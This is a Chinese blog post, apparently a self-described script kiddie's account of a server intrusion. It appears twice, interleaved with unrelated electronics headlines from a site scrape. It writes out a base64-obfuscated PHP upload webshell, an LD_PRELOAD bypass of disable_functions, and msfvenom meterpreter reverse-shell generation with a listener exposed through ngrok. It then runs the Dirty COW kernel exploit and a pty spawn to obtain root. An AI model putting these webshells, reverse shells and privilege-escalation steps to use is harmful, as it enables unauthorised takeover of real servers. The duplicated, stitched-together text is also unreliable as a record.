记脚本小子的一次渗透全过程
一.前言
在一次综合渗透的过程中遇到的比较完整的一个渗透流程。很多现查的技巧,这次渗透的基础是基于队友已经在服务器写入了一句话木马但无法执行系统命令。 二.渗透过程 一开始,我想到的是传个大马上去,为了方便,先写入了一个上传马:
?a=fputs(fopen(base64_decode(c2hlbgwucghw),w),base64_decode(base64_decode(ueq5d2fiqwdeuxbbskhsbgjyqwdqu0frwdbaslrfvlrxewqxy0d4dllxumzabwxzwlnkzfd5zdbiwejmym1gdfptzgrpdzbluunsbwfxegxjrdbnww1gelpxnwhiv1vvsky5r1nveezvmxnuzfhcc2iyrmtymlpwykdvblhwc25ibuz0wlnkzetuc05dbwxtsunobgjyqjblu0fvskdacgjhvxblwhnoq21wamfhogdjanhtyjnkdelhrmpkr2x2ymlbouldy25jrzfszedodlpdqtljq2rrvdfovup5qkzua05vv1zcrlbtzhrkv3gwyvhcagnuuxzabtl5ylmxa1lyumhkejvjymljn1pxtm9ieufpvec5allxd2dabwxzwlrvz1bhbhvjsfywsuhsnwnhvwdqu0fuwm1sc1pty2dibuz0wlnbouldzdfjr3h2wvdszlptbhnau2mrwec0au8yvmphrzhnswp4cgjuqjfkq0iwzvhcbelemgdkm04xww0xcgrdy2dkbuzzzfdvz1btqw5wwejzyjjga0p6nwniauk3wldob2j5qwlqqzltyjnkdfbsehvqsej5wlq1y2jsehvqqzl3y21vk0lqddlav3h6wlncn2fxww9ivzkywly5mwnhehzzv1jswky5bwfxegxlq1iwwlcxd0xdum1hv3hss1nsn1pxtm9ieufpum1sc1ptqjfjr3h2wvdsbfpdqnpkv05qwlhoelpuvnnisgt1uehbk1hhnglpmzfsykhobelidgxzmmh2sunkvmjtrmlir1vnzec4z2ryqnnimkzrsunjz0xpqwtabwxzwlnbduldsxvqseerwec0au8zmtlqejq9))); 利用这个上传马(shell.php)上传了一个比较常用的大马(297.php)。发现无法执行系统命令(无回显):
查看phpinfo()发现应该是disable_function()的原因。随即使用github上大佬ld_preload的bypass马:
https://github.com/zhinaonet/bypass_disablefunc_via_ld_preload 成功执行命令:
可以执行命令后便想着提权,直接上虚拟机里的kali先用ngrok把虚拟机里的内网穿透出去:
启动msf:
msfconsole msfvenom -l payloads msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=ip lport=10017 -f elf > shell.elf 生成反弹shell:
use exploit/multi/handler set payload linux/x64/meterpreter_reverse_tcp set lhost 192.168.1.170 set lport 4444 run 开启监听,同时把生成的elf文件用上传马上传到服务器,用bypass马chmod赋予权限后执行。 即可反弹成功:
拿到反弹shell后就想着提权,一看内核版本是在脏牛的覆盖范围,就尝试脏牛一把梭。 先去github上下载脏牛的exp源码:
https://github.com/firefart/dirtycow 上传上去之后执行命令:gcc -pthread dirty.c -o dirty -lcrypt ./dirty 执行成功! 但在su切换用户的时候出现了幺蛾子:
standard in must be a tty这种情况我还是头一次遇见。通过查询,发现可以用python绕过它:
python -c 'import pty; pty.spawn(/bin/sh)' su firefart
输入密码,即可提权成功:
于此已经拿到了root权限。后渗透阶段由于本人不太熟悉就暂且不提了。
三.总结 这次渗透没有什么特别难的难点,主要是队友把一句话传上去打了个好的基础。作为脚本小子的我也不过是用网上大佬们的工具完成了此次渗透。学艺不精还需要继续和菊苣们学习。
单相可控整流电路
Linux以inode的方式,让数据形成文件
基于LCDSI71263液晶显示模块电路设计
FF的领先技术优势获得恒大支持
台湾仍为全球PCB龙头,中国内地厂商急起直追
记脚本小子的一次渗透全过程
荣耀笔记本技术创新将给手机进行无线充电
“哪吒、寄生虫”大片随意看 南瓜影视全免无忧
柔性传感器是可穿戴电子设备的核心部件之一
灵云支持打造“能说会听、能思考、会判断”的智能终端
LTC6228高速运算放大器
智能家居产品如何一步一步逐渐走向高端装修领域
TurboDrive技术:突破带宽限制,让数据传输速度提高150%!
一种可以作为人造肌肉用于微仿生机器人的新材料
CDCE 2023国际数据中心展 | 构筑绿色算力底座,让数字世界坚定运行
如何实现紧致化的视觉大数据分析系统
氮化镓外延片工艺流程介绍 外延片与晶圆的区别
存储器厂商勾结的这种说法为什么会成立呢?仅仅是存储器制造商的自我调控吗?
输电系统的电压降落怎么算
镭拓深度盘点小型手持式激光焊接机在应用中的优缺点
在一次综合渗透的过程中遇到的比较完整的一个渗透流程。很多现查的技巧,这次渗透的基础是基于队友已经在服务器写入了一句话木马但无法执行系统命令。 二.渗透过程 一开始,我想到的是传个大马上去,为了方便,先写入了一个上传马:
?a=fputs(fopen(base64_decode(c2hlbgwucghw),w),base64_decode(base64_decode(ueq5d2fiqwdeuxbbskhsbgjyqwdqu0frwdbaslrfvlrxewqxy0d4dllxumzabwxzwlnkzfd5zdbiwejmym1gdfptzgrpdzbluunsbwfxegxjrdbnww1gelpxnwhiv1vvsky5r1nveezvmxnuzfhcc2iyrmtymlpwykdvblhwc25ibuz0wlnkzetuc05dbwxtsunobgjyqjblu0fvskdacgjhvxblwhnoq21wamfhogdjanhtyjnkdelhrmpkr2x2ymlbouldy25jrzfszedodlpdqtljq2rrvdfovup5qkzua05vv1zcrlbtzhrkv3gwyvhcagnuuxzabtl5ylmxa1lyumhkejvjymljn1pxtm9ieufpvec5allxd2dabwxzwlrvz1bhbhvjsfywsuhsnwnhvwdqu0fuwm1sc1pty2dibuz0wlnbouldzdfjr3h2wvdszlptbhnau2mrwec0au8yvmphrzhnswp4cgjuqjfkq0iwzvhcbelemgdkm04xww0xcgrdy2dkbuzzzfdvz1btqw5wwejzyjjga0p6nwniauk3wldob2j5qwlqqzltyjnkdfbsehvqsej5wlq1y2jsehvqqzl3y21vk0lqddlav3h6wlncn2fxww9ivzkywly5mwnhehzzv1jswky5bwfxegxlq1iwwlcxd0xdum1hv3hss1nsn1pxtm9ieufpum1sc1ptqjfjr3h2wvdsbfpdqnpkv05qwlhoelpuvnnisgt1uehbk1hhnglpmzfsykhobelidgxzmmh2sunkvmjtrmlir1vnzec4z2ryqnnimkzrsunjz0xpqwtabwxzwlnbduldsxvqseerwec0au8zmtlqejq9))); 利用这个上传马(shell.php)上传了一个比较常用的大马(297.php)。发现无法执行系统命令(无回显):
查看phpinfo()发现应该是disable_function()的原因。随即使用github上大佬ld_preload的bypass马:
https://github.com/zhinaonet/bypass_disablefunc_via_ld_preload 成功执行命令:
可以执行命令后便想着提权,直接上虚拟机里的kali先用ngrok把虚拟机里的内网穿透出去:
启动msf:
msfconsole msfvenom -l payloads msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=ip lport=10017 -f elf > shell.elf 生成反弹shell:
use exploit/multi/handler set payload linux/x64/meterpreter_reverse_tcp set lhost 192.168.1.170 set lport 4444 run 开启监听,同时把生成的elf文件用上传马上传到服务器,用bypass马chmod赋予权限后执行。 即可反弹成功:
拿到反弹shell后就想着提权,一看内核版本是在脏牛的覆盖范围,就尝试脏牛一把梭。 先去github上下载脏牛的exp源码:
https://github.com/firefart/dirtycow 上传上去之后执行命令:gcc -pthread dirty.c -o dirty -lcrypt ./dirty 执行成功! 但在su切换用户的时候出现了幺蛾子:
standard in must be a tty这种情况我还是头一次遇见。通过查询,发现可以用python绕过它:
python -c 'import pty; pty.spawn(/bin/sh)' su firefart
输入密码,即可提权成功:
于此已经拿到了root权限。后渗透阶段由于本人不太熟悉就暂且不提了。
三.总结 这次渗透没有什么特别难的难点,主要是队友把一句话传上去打了个好的基础。作为脚本小子的我也不过是用网上大佬们的工具完成了此次渗透。学艺不精还需要继续和菊苣们学习。
单相可控整流电路
Linux以inode的方式,让数据形成文件
基于LCDSI71263液晶显示模块电路设计
FF的领先技术优势获得恒大支持
台湾仍为全球PCB龙头,中国内地厂商急起直追
记脚本小子的一次渗透全过程
荣耀笔记本技术创新将给手机进行无线充电
“哪吒、寄生虫”大片随意看 南瓜影视全免无忧
柔性传感器是可穿戴电子设备的核心部件之一
灵云支持打造“能说会听、能思考、会判断”的智能终端
LTC6228高速运算放大器
智能家居产品如何一步一步逐渐走向高端装修领域
TurboDrive技术:突破带宽限制,让数据传输速度提高150%!
一种可以作为人造肌肉用于微仿生机器人的新材料
CDCE 2023国际数据中心展 | 构筑绿色算力底座,让数字世界坚定运行
如何实现紧致化的视觉大数据分析系统
氮化镓外延片工艺流程介绍 外延片与晶圆的区别
存储器厂商勾结的这种说法为什么会成立呢?仅仅是存储器制造商的自我调控吗?
输电系统的电压降落怎么算
镭拓深度盘点小型手持式激光焊接机在应用中的优缺点